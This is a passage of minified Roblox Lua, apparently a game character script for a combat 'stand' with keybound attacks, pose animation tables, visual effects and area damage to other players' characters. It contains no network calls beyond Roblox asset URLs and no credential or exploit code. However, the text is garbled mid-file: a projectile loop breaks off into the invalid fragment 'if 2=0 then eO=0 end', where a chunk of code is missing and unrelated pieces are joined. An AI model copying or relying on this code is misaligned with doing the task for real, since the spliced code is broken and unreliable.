Arm"):FindFirstChild("Attachment").Name="Attachment7"Character.AdvancingFortress:WaitForChild("Left Arm"):FindFirstChild("Attachment").Name="Attachment8"Character.AdvancingFortress:WaitForChild("Right Leg"):FindFirstChild("Attachment").Name="Attachment9"Character.AdvancingFortress:WaitForChild("Left Leg"):FindFirstChild("Attachment").Name="Attachment10"Character.AdvancingFortress:WaitForChild("FHead"):FindFirstChild("Attachment").Name="Attachment666"Character.AdvancingFortress:WaitForChild("FHead"):FindFirstChild("Attachment").Name="Attachment69"Character.AdvancingFortress:WaitForChild("FHead"):FindFirstChild("Attachment").Name="Attachment420"Character.AdvancingFortress:WaitForChild("FHead"):FindFirstChild("Attachment").Name="Attachment1337"Character.AdvancingFortress:WaitForChild("FHead").Attachment666.Position=Vector3.new(0,-0.5,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment69.Position=Vector3.new(0,1,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0.01)function FireProjectiles()dS=true;Humanoid.WalkSpeed=20;for T=0,1,0.1 do swait()Effects.Elec.Create(HitboxR.CFrame,2,2,2)PlayAnimationFromTable({CFrame.new(0,-0.100000001,0,1,0,0,0,1,0,0,0,1)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0,1.49999201,0,1,0,0,0,1,0,0,0,1)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.874554753,1.14087927,-1.06730831,-0.166365892,0.198266983,0.965925813,0.797995508,-0.548363924,0.250000268,0.579245627,0.812396049,-0.0669871047)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.257126778,1.24225974,-0.962940335,0.692363203,-0.593008757,-0.411064416,-0.708803177,-0.665577948,-0.233675212,-0.135024026,0.453151852,-0.88114804)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.604643881,-1.9909004,0.0280392915,0.962250233,-0.0841861367,-0.258818984,0.0871560201,0.996194661,4.23252061E-7,0.257834047,-0.0225580372,0.965925872)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.604644895,-1.99090064,0.0280393362,0.962250233,0.0841861367,0.258818984,-0.0871560201,0.996194661,4.23252061E-7,-0.257834047,-0.0225580372,0.965925872)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end;for T=0,1,0.1 do swait()Effects.Elec.Create(HitboxR.CFrame,3,3,3)Effects.Block.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,1,1,1,0.1)Effects.Sphere2.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,1,1,1,0.1)PlayAnimationFromTable({CFrame.new(0,-0.100000001,0,1,0,0,0,1,0,0,0,1)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0,1.49999201,0,1,0,0,0,1,0,0,0,1)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.661153734,0.568759024,-0.827975571,-0.166752055,0.025078943,0.985679924,0.98324734,-0.0704026297,0.168131784,0.0736110285,0.99720335,-0.012919019)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.390097797,0.861622274,-0.554995477,0.351840883,-0.837056041,-0.418981194,-0.935129642,-0.294365793,-0.197183579,0.0417199843,0.461178988,-0.886325777)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.604644954,-1.9909004,0.0280390829,0.962250233,-0.0841861367,-0.258818984,0.0871560201,0.996194661,4.23252061E-7,0.257834047,-0.0225580372,0.965925872)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.604644775,-1.99090064,0.0280380547,0.962250233,0.0841861367,0.258818984,-0.0871560201,0.996194661,4.23252061E-7,-0.257834047,-0.0225580372,0.965925872)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.2,false)end;for T=1,10 do for T=0,1,0.3 do swait()Effects.Elec.Create(HitboxR.CFrame,3,3,3)Effects.Sphere2.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,1,1,1,0.1)PlayAnimationFromTable({CFrame.new(0,-0.100000001,0,1,0,0,0,1,0,0,0,1)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0,1.49999201,0,1,0,0,0,1,0,0,0,1)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.661153734,0.568759024,-0.827975571,-0.166752055,0.025078943,0.985679924,0.98324734,-0.0704026297,0.168131784,0.0736110285,0.99720335,-0.012919019)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.390097797,0.861622274,-0.554995477,0.351840883,-0.837056041,-0.418981194,-0.935129642,-0.294365793,-0.197183579,0.0417199843,0.461178988,-0.886325777)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.604644954,-1.9909004,0.0280390829,0.962250233,-0.0841861367,-0.258818984,0.0871560201,0.996194661,4.23252061E-7,0.257834047,-0.0225580372,0.965925872)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.604644775,-1.99090064,0.0280380547,0.962250233,0.0841861367,0.258818984,-0.0871560201,0.996194661,4.23252061E-7,-0.257834047,-0.0225580372,0.965925872)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end;Effects.Sphere2.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,2,2,2,0.07)local jP=CFrame.new((HitboxR.Position+Mouse.Hit.p)/2,Mouse.Hit.p)TrueAim(jP.lookVector)for T=0,1,0.3 do swait()Effects.Elec.Create(HitboxR.CFrame,3,3,3)Effects.Sphere2.Create(BrickColor.new("Cool yellow"),HitboxR.CFrame,1,1,1,1,1,1,0.1)PlayAnimationFromTable({CFrame.new(1.90734863E-6,-0.25291419,0.238341585,1,0,0,0,0.996194661,-0.087155968,0,0.087155968,0.996194661)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0,1.49999189,-1.1920929E-6,1,0,0,0,0.98480767,0.173648626,0,-0.173648626,0.98480767)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.689965963,0.767623663,-0.856841147,-0.544456005,0.160545677,0.823281765,0.798456132,-0.201499581,0.567332089,0.256973624,0.966241658,-0.0184810348)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.392649293,0.920519292,-0.977094412,0.403439909,-0.887421727,-0.222977459,-0.91384387,-0.378501445,-0.147058249,0.0461054072,0.263095737,-0.963667512)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.598512471,-1.89166105,0.0173719227,0.962250233,-0.061308533,-0.265171409,0.0871564373,0.992403805,0.0868248865,0.257834017,-0.106658652,0.960284173)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.598512232,-1.89166129,0.0173728764,0.962250233,0.061308533,0.265171409,-0.0871564373,0.992403805,0.0868248865,-0.257834017,-0.106658652,0.960284173)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end end;Humanoid.WalkSpeed=20;dS=false end;Mouse.KeyDown:connect(function(O)O=O:lower()if dS==false and pL==false and O=="z"and pN==false and pH==false then pL=true;ORA()elseif dS==false and O=="x"and pN==false and pH==false then GRABEMBOIGRABEM()elseif dS==false and O=="q"and pN==false and pH==false then FireProjectiles()elseif dS==false and O=="f"and pH==false and pN==false then pH=true;Effects.Sphere.Create(BrickColor.new("Cool yellow"),Torso.CFrame,1,1,1,4,4,4,0.1)Effects.Block.Create(BrickColor.new("Cool yellow"),Torso.CFrame,1,1,1,4,4,4,0.1,1)Disappear()elseif dS==false and O=="f"and pH==true and pN==false then pH=false;Effects.Sphere.Create(BrickColor.new("Cool yellow"),Torso.CFrame,1,1,1,4,4,4,0.08)for T=1,2 do Effects.Block.Create(BrickColor.new("Cool yellow"),Torso.CFrame,1,1,1,4,4,4,0.1,1)end;for T=1,20 do Effects.Break.Create(BrickColor.new("Cool yellow"),Torso.CFrame,1,1,1)end;Reappear()elseif dS==false and pO==false and O=="c"and pN==false and pH==false then pO=true;HoloHexShield()elseif dS==false and O=="v"and pN==false and pH==false then CastleCrusherFist()end;if O=="["and pN==false and pH==false then Armor("On")end;if O=="]"and pN==true and pH==false then Armor("Off")end end)Mouse.KeyUp:connect(function(O)O=O:lower()if dS==true and pL==true and O=="z"and pN==false then pL=false elseif dS==true and pO==true and O=="c"and pN==false then pO=false end end)coroutine.resume(coroutine.create(function(Part,Part2)while Part.Parent~=nil do swait(math.random(100,150))for T=0,1,0.2 do wait()Eye1.Mesh.Scale=Vector3.new(1,0.7-1*T,1)Eye2.Mesh.Scale=Vector3.new(1,0.7-1*T,1)end;for T=0,1,0.2 do swait()Eye1.Mesh.Scale=Vector3.new(1,0.7+0.3*T,1)Eye2.Mesh.Scale=Vector3.new(1,0.7+0.3*T,1)end end end),Eye1,Eye2)while true do swait()for T,v in pairs(Character:children())do if v:IsA("Part")and pN==true then v.Anchored=false end end;for T,v in pairs(AdvancingFortress:GetChildren())do if v:IsA("Part")then v.Material="SmoothPlastic"v.CanCollide=false elseif v:IsA("Humanoid")then v:remove()elseif v:IsA("Accessory")then v:remove()elseif v:IsA("Shirt")then v:remove()elseif v:IsA("Pants")then v:remove()elseif v:IsA("Script")or v:IsA("LocalScript")then v:remove()elseif v:IsA("BodyColors")then v:remove()end end;HHandle.Transparency=1;THandle.Transparency=1;AHandleR.Transparency=1;AHandleL.Transparency=1;LHandleR.Transparency=1;LHandleL.Transparency=1;RootPart.Transparency=1;HitboxR.Transparency=1;HitboxL.Transparency=1;Head.BrickColor=BrickColor.new("Cool yellow")Torso.BrickColor=BrickColor.new("Camo")RightArm.BrickColor=BrickColor.new("Cool yellow")LeftArm.BrickColor=BrickColor.new("Cool yellow")RightLeg.BrickColor=BrickColor.new("Cool yellow")LeftLeg.BrickColor=BrickColor.new("Cool yellow")RootPart.Anchored=true;id=(Character.HumanoidRootPart.Velocity*Vector3.new(1,0,1)).magnitude;ie=Character.HumanoidRootPart.Velocity.y;dQ=dQ+dR;Shield.Anchored=true;Shield.CFrame=Shield.CFrame:lerp(RootPart.CFrame*CFrame.new(0,0,-3.2),1)local hit,pos=rayCast(Character.HumanoidRootPart.Position,CFrame.new(Character.HumanoidRootPart.Position,Character.HumanoidRootPart.Position-Vector3.new(0,1,0)).lookVector,4,Character)if Character.HumanoidRootPart.Velocity.y>1 and hit==nil then N="Jump"if dS==false then RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(2,1+0.5*math.cos(dQ/20),3),0.5)PlayAnimationFromTable({CFrame.new(0,0.00872418843,0.0292903651,1,0,0,0,0.996194661,-0.087155968,0,0.087155968,0.996194661)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0,1.49999177,-1.49011612E-7,1,0,0,0,0.98480767,0.173648626,0,-0.173648626,0.98480767)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.64140427,0.273908556,0.192029893,0.946035206,-0.31541416,0.0743736848,0.284469575,0.91821146,0.275617331,-0.155224368,-0.239586651,0.958386064)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.59350562,0.239538491,0.192243189,0.935008764,0.347148597,-0.0724328309,-0.312019885,0.902400434,0.297181845,0.168529674,-0.255267143,0.952069581)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.602718651,-1.95556056,0.410092652,0.978475571,0.0150757888,-0.205834776,0.0853612274,0.878464639,0.470120817,0.187906027,-0.477568805,0.85826844)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.41903314,-1.41877925,-0.229210436,0.962251842,-0.0299757104,0.270510197,-0.084186092,0.912393093,0.400567293,-0.258819073,-0.408219665,0.875425339)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end elseif Character.HumanoidRootPart.Velocity.y<-1 and hit==nil then N="Fall"if dS==false then RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(2,1+0.5*math.cos(dQ/20),3),0.5)PlayAnimationFromTable({CFrame.new(0,-0.0366669223,-0.0478199311,1,0,0,0,0.996194661,0.087155968,0,-0.087155968,0.996194661)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0,1.58110774,-0.115850762,1,0,0,0,0.98480767,0.173647821,0,-0.173647821,0.98480767)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.72150326,0.610064566,0.0891361833,0.724097908,-0.685675204,0.0743751749,0.645872176,0.711960018,0.275611937,-0.241932437,-0.151533186,0.958387375)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.69228244,0.568353653,0.082095027,0.759895504,0.646005511,-0.0724337399,-0.601845145,0.741260946,0.297183931,0.24567467,-0.182231784,0.952074111)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.60271728,-1.95556188,0.410093039,0.978470623,-0.00292155147,-0.206365243,0.0853614658,0.916095972,0.391767859,0.187905625,-0.400949359,0.896622121)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.453899324,-1.81726217,-0.229221463,0.962255239,-0.00628663599,0.272094905,-0.0841865242,0.943832874,0.319526881,-0.258820891,-0.33037129,0.90767473)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end elseif id<1 and hit~=nil then N="Idle"if dS==false then Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0.01)dR=1;RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(2,1+0.5*math.cos(dQ/20),3),0.5)PlayAnimationFromTable({CFrame.new(0,-0.00190299738,-0.0435779989,1,0,0,0,0.996194661,0.087155968,0,-0.087155968,0.996194661)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0,1.49999213,3.27825546E-7,1,0,0,0,0.99619478,0.0871553123,0,-0.0871553123,0.99619478)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.64141297,0.173907071,-0.107973814,0.946035922,-0.270955235,0.177766502,0.284470022,0.957103431,-0.055051513,-0.155224428,0.102649838,0.982532144)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.59350157,0.139536366,-0.107754946,0.935009062,0.284010828,-0.212358981,-0.312018842,0.943447471,-0.11203292,0.168530986,0.171011835,0.970748305)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.602711678,-1.89952374,-0.0967197716,0.978471398,-0.0562333167,-0.198576227,0.0853610933,0.986278713,0.141314447,0.187904745,-0.155223012,0.969844699)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.619029164,-1.90815639,-0.0860156417,0.962250412,0.0410595387,0.269051194,-0.0841863081,0.984977186,0.150772721,-0.258818805,-0.167731494,0.951251626)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end elseif id>2 and hit~=nil then N="Walk"if dS==false then Character.AdvancingFortress:WaitForChild("FHead").Attachment6.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment420.Position=Vector3.new(0,0,0.01)Character.AdvancingFortress:WaitForChild("FHead").Attachment1337.Position=Vector3.new(0,0,0)RootPart.CFrame=RootPart.CFrame:lerp(Character.HumanoidRootPart.CFrame*CFrame.new(2,1+0.5*math.cos(dQ/20),3),0.5)PlayAnimationFromTable({CFrame.new(0,-0.0234659836,-0.171147972,1,0,0,0,0.939692736,0.342019886,0,-0.342019916,0.939692736)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0,1.49999166,1.1920929E-7,1,0,0,0,0.98480773,-0.173648983,0,0.173648953,0.98480773)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(1.60905385,0.122740321,0.227665678,0.946036339,-0.320693314,0.0465966538,0.284468234,0.89069742,0.354595304,-0.155219615,-0.322205007,0.93385905)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-1.55878484,0.127169654,0.148623466,0.93500936,0.339513272,-0.102411598,-0.312018752,0.924868107,0.217401206,0.168527737,-0.171317667,0.970695019)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(0.585851789,-1.60362172,-0.143285036,0.978476226,0.0150748575,-0.205834031,0.0853618756,0.878461003,0.470117748,0.187905103,-0.477570593,0.858265638)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0),CFrame.new(-0.563320339,-1.90456724,0.225245774,0.982039452,-0.00800410938,0.188514173,-0.0707257539,0.910641074,0.407099873,-0.174927384,-0.413120717,0.893718541)*CFrame.new(0,0,0)*CFrame.Angles(0,0,0)},0.3,false)end end;if 0<#Effects then for c5=1,#Effects do if Effects[c5]~=nil then local jw=Effects[c5]if jw~=nil then local Part=jw[1]local fj=jw[2]local Delay=jw[3]local jx=jw[4]local jy=jw[5]local jz=jw[6]if jw[2]=="Shoot"then local pS=jw[1]local pT=30;if jw[8]==3 then pT=10 end;local hit,pos=rayCast(jw[4],jw[1],pT,m)if jw[10]~=nil then da=pos;cf2=CFrame.new(jw[4],jw[10].Position)cfa=CFrame.new(jw[4],pos)tehCF=cfa:lerp(cf2,0.2)jw[1]=tehCF.lookVector end;local gO=(jw[4]-pos).magnitude;Effects.Head.Create(Torso.BrickColor,CFrame.new((jw[4]+pos)/2,pos)*CFrame.Angles(1.57,0,0),1,gO*5,1,0.5,0,0.5,0.2)if jw[8]==2 then Effects.Ring.Create(Torso.BrickColor,CFrame.new((jw[4]+pos)/2,pos)*CFrame.Angles(1.57,0,0)*CFrame.fromEulerAnglesXYZ(1.57,0,0),1,1,0.1,0.5,0.5,0.1,0.1,1)end;jw[4]=jw[4]+pS*pT;jw[3]=jw[3]-1;if 2=0 then eO=0 end;return eO end;function NegativeAngle(eO)if eO<=0 then eO=0 end;return eO end;function Swait(eO)if eO==0 or eO==nil then game:GetService("RunService").Heartbeat:wait()else for T=1,eO do game:GetService("RunService").Heartbeat:wait()end end end;function CreateMesh(fs,ft,fu,fv,fw,fx,fy)local fz=IT(fs)if fs=="SpecialMesh"then fz.MeshType=fu;if fv~="nil"and fv~=""then fz.MeshId="http://www.roblox.com/asset/?id="..fv end;if fw~="nil"and fw~=""then fz.TextureId="http://www.roblox.com/asset/?id="..fw end end;fz.Offset=fy or VT(0,0,0)fz.Scale=fx;fz.Parent=ft;return fz end;function CreatePart(fA,ft,fB,fC,fD,fE,fF,fG,fH)local fI=IT("Part")fI.formFactor=fA;fI.Reflectance=fC;fI.Transparency=fD;fI.CanCollide=false;fI.Locked=true;fI.Anchored=true;if fH==false then fI.Anchored=false end;fI.BrickColor=BRICKC(tostring(fE))fI.Name=fF;fI.Size=fG;fI.Position=Torso.Position;fI.Material=fB;fI:BreakJoints()fI.Parent=ft;return fI end;local function mY(a,b)local mZ=Instance.new("ManualWeld")mZ.Part0=a;mZ.Part1=b;mZ.C0=CFrame.new()mZ.C1=b.CFrame:inverse()*a.CFrame;mZ.Parent=a;return mZ end;function QuaternionFromCFrame(cf)local iy,iz,iA,iB,iC,iD,iE,iF,iG,iH,iI,iJ=cf:components()local iK=iB+iF+iJ;if iK>0 then local s=math.sqrt(1+iK)local iL=0.5/s;return(iI-iG)*iL,(iD-iH)*iL,(iE-iC)*iL,s*0.5 else local T=0;if iF>iB then T=1 end;if iJ>(T==0 and iB or iF)then T=2 end;if T==0 then local s=math.sqrt(iB-iF-iJ+1)local iL=0.5/s;return 0.5*s,(iE+iC)*iL,(iH+iD)*iL,(iI-iG)*iL elseif T==1 then local s=math.sqrt(iF-iJ-iB+1)local iL=0.5/s;return(iC+iE)*iL,0.5*s,(iI+iG)*iL,(iD-iH)*iL elseif T==2 then local s=math.sqrt(iJ-iB-iF+1)local iL=0.5/s;return(iD+iH)*iL,(iG+iI)*iL,0.5*s,(iE-iC)*iL end end end;function QuaternionToCFrame(iM,iN,iO,x,iP,z,c4)local iQ,iR,iS=x+x,iP+iP,z+z;local iT,iU,iV=c4*iQ,c4*iR,c4*iS;local iW=x*iQ;local iX=x*iR;local iY=x*iS;local iZ=iP*iR;local i_=iP*iS;local j0=z*iS;return CFrame.new(iM,iN,iO,1-(iZ+j0),iX-iV,iY+iU,iX+iV,1-(iW+j0),i_-iT,iY-iU,i_+iT,1-(iW+iZ))end;function QuaternionSlerp(a,b,t)local j1=a[1]*b[1]+a[2]*b[2]+a[3]*b[3]+a[4]*b[4]local j2,j3;if j1>=0.0001 then if 1-j1>0.0001 then local j4=ACOS(j1)local j5=1/SIN(j4)j2=SIN((1-t)*j4)*j5;j3=SIN(t*j4)*j5 else j2=1-t;j3=t end else if 1+j1>0.0001 then local j4=ACOS(-j1)local j5=1/SIN(j4)j2=SIN((t-1)*j4)*j5;j3=SIN(t*j4)*j5 else j2=t-1;j3=t end end;return a[1]*j2+b[1]*j3,a[2]*j2+b[2]*j3,a[3]*j2+b[3]*j3,a[4]*j2+b[4]*j3 end;function Clerp(a,b,t)local io={QuaternionFromCFrame(a)}local ip={QuaternionFromCFrame(b)}local iq,ir,is=a.x,a.y,a.z;local iu,iv,iw=b.x,b.y,b.z;local ix=1-t;return QuaternionToCFrame(ix*iq+t*iu,ix*ir+t*iv,ix*is+t*iw,QuaternionSlerp(io,ip,t))end;function CreateFrame(ft,fD,m_,mU,fG,fX,n0,fF)local n1=IT("Frame")n1.BackgroundTransparency=fD;n1.BorderSizePixel=m_;n1.Position=mU;n1.Size=fG;n1.BackgroundColor3=fX;n1.BorderColor3=n0;n1.Name=fF;n1.Parent=ft;return n1 end;function CreateLabel(ft,n3,n4,n5,n6,fD,m_,n7,fF)local n8=IT("TextLabel")n8.BackgroundTransparency=1;n8.Size=UD2(1,0,1,0)n8.Position=UD2(0,0,0,0)n8.TextColor3=n4;n8.TextStrokeTransparency=n7;n8.TextTransparency=fD;n8.FontSize=n5;n8.Font=n6;n8.BorderSizePixel=m_;n8.TextScaled=false;n8.Text=n3;n8.Name=fF;n8.Parent=ft;return n8 end;function NoOutlines(n9)n9.TopSurface,n9.BottomSurface,n9.LeftSurface,n9.RightSurface,n9.FrontSurface,n9.BackSurface=10,10,10,10,10,10 end;function CreateWeldOrSnapOrMotor(fP,ft,na,nb,eo,ep)local nc=IT(fP)nc.Part0=na;nc.Part1=nb;nc.C0=eo;nc.C1=ep;nc.Parent=ft;return nc end;local dA=IT("Sound")function CreateSound(fJ,ft,fK,fL,fM)local fN=nil;coroutine.resume(coroutine.create(function()fN=dA:Clone()fN.Parent=ft;fN.Volume=fK;fN.Pitch=fL;fN.SoundId="http://www.roblox.com/asset/?id="..fJ;fN:play()if fM==true then fN.Looped=true else repeat wait(1)until fN.Playing==false;fN:remove()end end))return fN end;function CFrameFromTopBack(nd,ne,nf)local ng=ne:Cross(nf)return CF(nd.x,nd.y,nd.z,ng.x,ne.x,nf.x,ng.y,ne.y,nf.y,ng.z,ne.z,nf.z)end;function WACKYEFFECT(fO)local fP=fO.EffectType or"Sphere"local fG=fO.Size or VT(1,1,1)local fQ=fO.Size2 or VT(0,0,0)local fD=fO.Transparency or 0;local fR=fO.Transparency2 or 1;local fS=fO.CFrame or Torso.CFrame;local fT=fO.MoveToPos or nil;local fU=fO.RotationX or 0;local fV=fO.RotationY or 0;local fW=fO.RotationZ or 0;local fB=fO.Material or"Neon"local fX=fO.Color or C3(1,1,1)local fY=fO.Time or 45;local fZ=fO.SoundID or nil;local f_=fO.SoundPitch or nil;local g0=fO.SoundVolume or nil;coroutine.resume(coroutine.create(function()local g1=false;local g2=nil;local g3=CreatePart(3,Effects,fB,0,fD,BRICKC("Pearl"),"Effect",VT(1,1,1),true)if fZ~=nil and f_~=nil and g0~=nil then g1=true;g2=CreateSound(fZ,g3,g0,f_,false)end;g3.Color=fX;local g4=nil;if fP=="Sphere"then g4=CreateMesh("SpecialMesh",g3,"Sphere","","",fG,VT(0,0,0))elseif fP=="Block"then g4=IT("BlockMesh",g3)g4.Scale=VT(fG.X,fG.X,fG.X)elseif fP=="Wave"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","20329976","",fG,VT(0,0,-fG.X/8))elseif fP=="Ring"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","559831844","",VT(fG.X,fG.X,0.1),VT(0,0,0))elseif fP=="Slash"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","662586858","",VT(fG.X/10,0,fG.X/10),VT(0,0,0))elseif fP=="Round Slash"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","662585058","",VT(fG.X/10,0,fG.X/10),VT(0,0,0))elseif fP=="Swirl"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","1051557","",fG,VT(0,0,0))elseif fP=="Skull"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","4770583","",fG,VT(0,0,0))elseif fP=="Crystal"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","9756362","",fG,VT(0,0,0))end;if g4~=nil then local g5=nil;if fT~=nil then g5=(fS.p-fT).Magnitude/fY end;local g6=fG-fQ;local g7=fD-fR;if fP=="Block"then g3.CFrame=fS*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))else g3.CFrame=fS end;for g9=1,fY+1 do Swait()g4.Scale=g4.Scale-g6/fY;if fP=="Wave"then g4.Offset=VT(0,0,-g4.Scale.X/8)end;g3.Transparency=g3.Transparency-g7/fY;if fP=="Block"then g3.CFrame=fS*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))else g3.CFrame=g3.CFrame*ANGLES(RAD(fU),RAD(fV),RAD(fW))end;if fT~=nil then local g8=g3.Orientation;g3.CFrame=CF(g3.Position,fT)*CF(0,0,-g5)g3.Orientation=g8 end end;if g1==false then g3:remove()else repeat Swait()until g2.Playing==false;g3:remove()end else if g1==false then g3:remove()else repeat Swait()until g2.Playing==false;g3:remove()end end end))end;function MakeForm(n9,fP)if fP=="Cyl"then local g4=IT("CylinderMesh",n9)elseif fP=="Ball"then local g4=IT("SpecialMesh",n9)g4.MeshType="Sphere"elseif fP=="Wedge"then local g4=IT("SpecialMesh",n9)g4.MeshType="Wedge"end end;Debris=game:GetService("Debris")function CastProperRay(nh,ni,nj,eV)local mV=CF(nh,ni).lookVector;return Raycast(nh,mV,nj,eV)end;function turnto(ad)RootPart.CFrame=CFrame.new(RootPart.CFrame.p,VT(ad.X,RootPart.Position.Y,ad.Z))*CFrame.new(0,0,0)end;for T=1,35 do local nn=CreatePart(3,Character,"Fabric",0,0+(T-1)/35.2,"Dark stone grey","FaceGradient",VT(1.01,0.5,1.01),false)nn.Color=C3(0,0,0)Head:FindFirstChildOfClass("SpecialMesh"):Clone().Parent=nn;CreateWeldOrSnapOrMotor("Weld",Head,Head,nn,CF(0,0.35-(T-1)/75,0),CF(0,0,0))end;local pU=CreatePart(3,Character,"Neon",0,0,"CGA brown","Eyeball",VT(0.15,0.15,0.15),false)MakeForm(pU,"Ball")CreateWeldOrSnapOrMotor("Weld",Head,Head,pU,CF(0.15,0.26,-0.55),CF(0,0,0))local pV=CreatePart(3,Character,"Neon",0,0,"CGA brown","Eyeball",VT(0.15,0.15,0.15),false)MakeForm(pV,"Ball")CreateWeldOrSnapOrMotor("Weld",Head,Head,pV,CF(-0.15,0.26,-0.55),CF(0,0,0))function Blink()coroutine.resume(coroutine.create(function()if pU~=nil then for T=1,5 do Swait()pU.Mesh.Scale=pU.Mesh.Scale-VT(0,0.2,0)pV.Mesh.Scale=pU.Mesh.Scale end;for T=1,7 do Swait()pU.Mesh.Scale=pU.Mesh.Scale+VT(0,0.2,0)pV.Mesh.Scale=pU.Mesh.Scale end;pU.Mesh.Scale=VT(1,1,1)pV.Mesh.Scale=pU.Mesh.Scale end end))end;local pW=Character.Stic;pW.Parent=Character;local pX=CreateWeldOrSnapOrMotor("Weld",RightArm,RightArm,pW.Grab,CF(0,-1,0),CF(0,0,0))local nu=C3(0,0,0)local nv="SciFi"local nw=7;function ApplyDamage(Humanoid,Damage)Damage=Damage*mz;if Humanoid.Health<2000 then if Humanoid.Health-Damage>0 then Humanoid.Health=Humanoid.Health-Damage else end else end end;function ApplyAoE(mU,mW,nz,nA,nB,nC)local pY=workspace:GetDescendants()for nD,nE in pairs(pY)do if nE.ClassName=="Model"and nE~=Character then local nF=nE:FindFirstChildOfClass("Torso")if nF then local nG=nE:FindFirstChild("Torso")or nE:FindFirstChild("UpperTorso")if nG then if(nG.Position-mU).Magnitude<=mW then if nC==true then nE:BreakJoints()else local nH=MRANDOM(nz,nA)ApplyDamage(nF,nH)end;if nB>0 then for U,c in pairs(nE:GetChildren())do if c:IsA("BasePart")then local bv=Instance.new("BodyVelocity")bv.maxForce=Vector3.new(1e9,1e9,1e9)bv.velocity=CF(mU,nG.Position).lookVector*nB;bv.Parent=c;Debris:AddItem(bv,0.05)end end end end end end end end end;function FireHit(n9,nz,nA)local pZ=n9.Touched:Connect(function(hit)if hit.Parent:FindFirstChildOfClass("Torso")then local nF=hit.Parent:FindFirstChildOfClass("Torso")local nG=hit.Parent:FindFirstChild("Torso")or 